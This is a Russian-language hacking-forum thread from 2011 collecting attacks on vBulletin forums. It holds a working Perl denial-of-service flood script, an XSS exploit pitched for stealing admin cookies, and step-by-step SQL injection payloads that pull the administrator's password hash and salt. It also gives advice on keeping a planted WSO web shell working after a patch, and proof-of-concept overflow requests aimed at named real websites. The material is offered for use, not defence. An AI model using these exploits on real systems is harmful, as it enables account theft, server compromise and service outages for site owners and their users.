ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|

19.08.2011, 07:25
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 1
Провел на форуме: 54835
Репутация:
0
|
|
vBulletin 4.0.0-4.0.2 YaAS (yet another award system) XSS Vulnerability
Код:
Code:
vBulletin 4.0.0-4.0.2 YaAS (yet another award system) XSS Vulnerability=======================================================================
vBulletin 4.0.0-4.0.2 YaAS (yet another award system) XSS Vulnerability
=======================================================================
# Exploit Title: vBulletin 4.0.0-4.0.2 YaAS 4.0.0 (yet another award system) XSS
# Date: 2010-05-13
# Author: Un-Dead
# Team: eX.ploit ( http://ex.ploit.net )
# Software Link: http://www.vbulletin.org/forum/showthread.php?t=232684&highlight=yet+another+award+system
# Google Dork: inurl: recommend_award.php?award_id=1
# Version: vBulletin 4.0.0 thru 4.0.2 using YaAS v4.0.0 (This has now been updated too 4.0.1 and does not work on the updated version)
# Tested on: Windows XP SP3, KDE3.5 vBulletin with HTML turned off
# Usage: XSS
# Code:
This will only work if the administrator has opted to set the ?recommend this award? to create a new poll somewhere in the forum (admin area is even better for cookie stealing J)
Again this will not work on the latest update of YaAS but it will work on YaAS 4.0.0
Click awards tab, chose recommend this award. In the member name just type something doesent really matter.
In the body put your xss
<script>alert(‘xss’);</script>
The infected page will be the poll that was created.
If the admin does not have the ?create new poll? enabled this eX.ploit is useless.
# Inj3ct0r.com [2010-05-13]var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}
|
|
|

24.08.2011, 20:22
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 1
Провел на форуме: 54835
Репутация:
0
|
|
vBulletin 4.1.3pl3 / 4.1.4pl3 / 4.1.5pl1 Cross Site Scriptin
vBulletin 4.1.3pl3 / 4.1.4pl3 / 4.1.5pl1 Cross Site Scriptin
Posted on 04 August 2011
*Advisory Information* Title: vBulletin Cross Site Scripting Vulnerability Date published: 02-08-2011 Vendors contacted: vBulletin team *Vulnerability Information* Class: XSS flaw Vulnerable page: Admin Login Page (admincp) Remotely Exploitable: Yes Locally Exploitable: No *Vulnerability Description* vBulletin is a community forum solution for a wide range of users, including industry leading companies. A XSS vulnerability has been discovered that could allow an attacker to carry out an action impersonating a legal user, or to obtain access to a user's account. This flaw allows unauthorized disclosure and modification of information, and it allows disruption of service. *Vulnerable versions* 4.1.3pl3, 4.1.4pl3 & 4.1.5pl1 *Non-vulnerable Packages* . vBulletin prior to 4.1.3 *Vendor Information, Solutions and Workarounds* vBulletin team has released patches for this flaw and patch is released on 02-08-2011. https://www.vbulletin.com/forum/showthread.php/385133-vBulletin-4.1.3-4.1.4-and-4.1.5-Security-Patch *Credits* This vulnerability was discovered by Muhammad Haroon from Innovative Solutions KSA. OWASP Chapter Lead of Pakistan. haroon [at] live [dot] it *Proof of Concept Code* This is a Cross Site Scripting (XSS) vulnerability within vBulletin community forum solution. In order to exploit this flaw following vector would be used. http://www.example.com/forums/admincp/?">alert('Xss_found_By_M.Haroon') *Report Timeline* 30-07-2011: Notifies the vBulletin team about the vulnerability. 31-07-2011: vBulletin Team ask for technical description about the flaw 31-07-2011: Technical Details sent to vbulletin team 02-08-2011: vBulletin notifies that a fix has been produced and is available to the users on 2nd August 2011 03-08-2011: Vulnerability publicly disclosed.
|
|
|

26.08.2011, 19:49
|
|
Новичок
Регистрация: 08.02.2010
Сообщений: 1
Провел на форуме: 54835
Репутация:
0
|
|
Если кому нужно, то вот так можно узнать версию форума:
http://xxxx.xxx/archive/archive.css ну или так:
http://xxxx.xxx/cpstyles/global.css
На самом деле вариантов много
|
|
|

14.09.2011, 01:04
|
|
Guest
Сообщений: n/a
Провел на форуме: 9412
Репутация:
0
|
|
Сообщение от BLurpi^_^
BLurpi^_^ said:
Для этого что то есть?
Ни это - http://www.exploit-db.com/exploits/17314/
Ни это - http://www.exploit-db.com/exploits/17555/
не работает
Проверка на работоспособность.
Код:
Code:
vBulletin 4.0.6 – Danial Of Service Exploit (redhat)====================================================
vBulletin 4.0.6 – Danial Of Service Exploit (redhat)
====================================================
################################################
Author : KnocKout
Thanks : DaiMon,BARCOD3
Contact : knockoutr@msn.com
Tested on : redhat
##############################################
##################vBulletin 4.0.6 – Danial Of Service Exploit for RedHat###############
#!/usr/bin/perl
use IO::Socket;
print "n+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+n";
print "+ vBulletin 4.0.6 D.O.S Exploit(FOR redhat) +n";
print "+ Coded by KnocKout +n";
print "+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+nn";
print "Host |without http://www.| ";
chomp($host = <STDIN>);
print "Path |example. /en or / | ";
chomp($pth = <STDIN>);
{
while($x != 999999)
{
$postit = "?t=0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000";
$lrg = length $postit;
my $sock = new IO::Socket::INET (
PeerAddr => "$host",
PeerPort => "80",
Proto => "tcp",
);
die "nOffline! – We can not Connect To ‘$host’ it May be DoSedn" unless $sock;
print $sock "POST $pth/showthread.php HTTP/1.1n";
print $sock "Host: $hostn";
print $sock "Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5n";
print $sock "Referer: $hostn";
print $sock "Accept-Language: en-usn";
print $sock "Content-Type: application/x-www-form-urlencodedn";
print $sock "Accept-Encoding: gzip, deflaten";
print $sock "User-Agent: Mozilla/5.0 (BeOS; U; BeOS X.6; en-US; rv:1.7.8) Gecko/20050511 Firefox/1.0.4n";
print $sock "Connection: Keep-Aliven";
print $sock "Cache-Control: no-cachen";
print $sock "Content-Length: $lrgnn";
print $sock "$postitn";
close($sock);
syswrite STDOUT, "Attack Started ";
$x++;
}
}
# Inj3ct0r.com [2010-09-02]var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src=’" + gaJsHost + "google-analytics.com/ga.js’ type=’text/javascript’%3E%3C/script%3E"));try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}
http://inj3ct0r.com/exploits/13952
|
|
|
|

17.09.2011, 16:00
|
|
Guest
Сообщений: n/a
Провел на форуме: 19272
Репутация:
0
|
|
Уязвимость пашет на vBulletin 4.x.x
Заходим, регистрируемся (не всегда обязательно, если поиск без всяких там капч и вопросов от имени гостя проходит, то рега не впёрлась).
Запускаем лису, плагин liveHTTPHeaders.
Вбиваем в поле поиска любую лабуду, например "4234234" и жмём enter
В liveHTTPHeaders редактируем запрос таким вот образом, дописывая это:
Код:
Code:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Отправляем запрос, выйдет ошибка Database error
Смотрим исходный код, внизу находим хэш, записываем
Теперь оправляем запрос на вывод соли, вот такой:
Код:
Code:
humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select salt from user where userid=1 and row(1,1)>(select count(*),concat( (select user.salt) ,0x3a,floor(rand(0)*2)) x from (select 1 union select 2 union select 3)a group by x limit 1) -- /*
Опять ошибка, опять смотрим исходный код, записываем соль.
Всё, осталось только расшифровать.
Иногда таблица не user называется, тогда хэш мы не увидим, а увидим на месте хэша какую-то лабуду, а чуть выше виден будет префикс, вот его и дописываем в наш запрос, и тогда всё бенч будет.
|
|
|
|

30.09.2011, 19:42
|
|
Новичок
Регистрация: 13.02.2010
Сообщений: 0
Провел на форуме: 3855
Репутация:
0
|
|
Итак дорогие друзья хотелось бы поговорить с вами о шеллах в данном форуме. Сейчас вышел патч для форума и при попытке зайти на шелл через модуль вылазить сообщение:
Код:
Code:
Your submission could not be processed because a security token was missing.
If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
Какой-то Forum
Как решить:
1.Можно править шелл (использую WSO 2.5)
2. А можно=> Опера=> форум с шелом=> Исходный код=> После
всавить
Код:
Code:
accesskey="r" tabindex="1"
=> Нажать применить изменеия=> Вуаля! Рабочий шелл!
ПС может давно известно. Но для меня стало очень актуально и ново данное открыие
ПСС Открыл сам.
|
|
|

30.09.2011, 21:46
|
|
Moderator - Level 7
Регистрация: 06.02.2009
Сообщений: 195
Провел на форуме: 2485155
Репутация:
719
|
|
Сообщение от Export
Export said:
Итак дорогие друзья хотелось бы поговорить с вами о шеллах в данном форуме. Сейчас вышел патч для форума и при попытке зайти на шелл через модуль вылазить сообщение:
Код:
Code:
Your submission could not be processed because a security token was missing.
If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
Какой-то Forum
.
Открою секрет: достаточно очистить кукисы админа и шелл нормально открывается
|
|
|

02.11.2011, 21:39
|
|
Guest
Сообщений: n/a
Провел на форуме: 40748
Репутация:
78
|
|
[3.8.x] Cyb - Advanced Forum Statistics
[4.0.x] VSa - Advanced Forum Statistics
c 4 линейки название немного изменилось. был помидор, стал томат.
FULL PATH DISCLOSURE
(раскрытие путей)
Possible integer overflow
3.8.X
модуль cyb_topstats
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$resultsnr_lp[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$resultsnr[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
4.0.X
Модуль vsa_topstats
PHP код:
PHP: [COLOR="#000000"][COLOR="#0000BB"]$vsacb_resnr_lp[/COLOR][COLOR="#007700"]= ([/COLOR][COLOR="#0000BB"]$vsacb_resnr[/COLOR][COLOR="#007700"]*[/COLOR][COLOR="#0000BB"]2[/COLOR][COLOR="#007700"]) +[/COLOR][COLOR="#0000BB"]1[/COLOR][COLOR="#007700"];
[/COLOR][/COLOR]
PoC for 3.8.X:
Код:
Code:
POST /misc.php?do=cybstats HTTP/1.1
Host: brutezone.ru
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://brutezone.ru/misc.php?do=cybstats
Cookie: куки. нужна авторизация.
Content-Type: application/x-www-form-urlencoded
Content-Length: 112
securitytoken=1320250782-fda4c39ad1983a01f3b3ce9b94b7350c35099352&resultsnr=999999999999999999999999999999999999
PoC for 4.0.X:
(на 4.1.X не пробовал.)
Код:
Code:
POST /misc.php?do=vsastats HTTP/1.1
Host: www.html.by
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:7.0.1) Gecko/20100101 Firefox/7.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Accept-Charset: windows-1251,utf-8;q=0.7,*;q=0.7
Connection: keep-alive
Referer: http://www.html.by/misc.php?do=vsastats
Cookie: куки. нужна авторизация.
Content-Type: application/x-www-form-urlencoded
Content-Length: 124
securitytoken=1320251249-9e5b6a09879833baf7af3e58fae882855e302814&vsacb_resnr=5999999999999999999999999999999999999999999999
|
|
|
|

27.11.2011, 16:36
|
|
Guest
Сообщений: n/a
Провел на форуме: 28093
Репутация:
11
|
|
Сообщение от SergioBlog
SergioBlog said:
Нужна помощь в заливке шелла.
Создаю плагин с кодом шелла wso, пихаю его в faq_complete, но при выполнении какой-то команды или переходе в папку выдаёт:
Your submission could not be processed because a security token was missing.
If this occurred unexpectedly, please inform the administrator and describe the action you performed before you received this error.
как можно решить эту проблему? Вариант с system($_GET["cmd"]); не подходит тк все функции для выполнения системных команд отключены.
Простo куки почисти, пройдет)
|
|
|
|

11.12.2011, 16:46
|
|
Guest
Сообщений: n/a
Провел на форуме: 149611
Репутация:
81
|
|
[CENTER][SIZE="3"][COLOR="DarkOrange"]vBulletin
|
|
|
|
|
 |
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|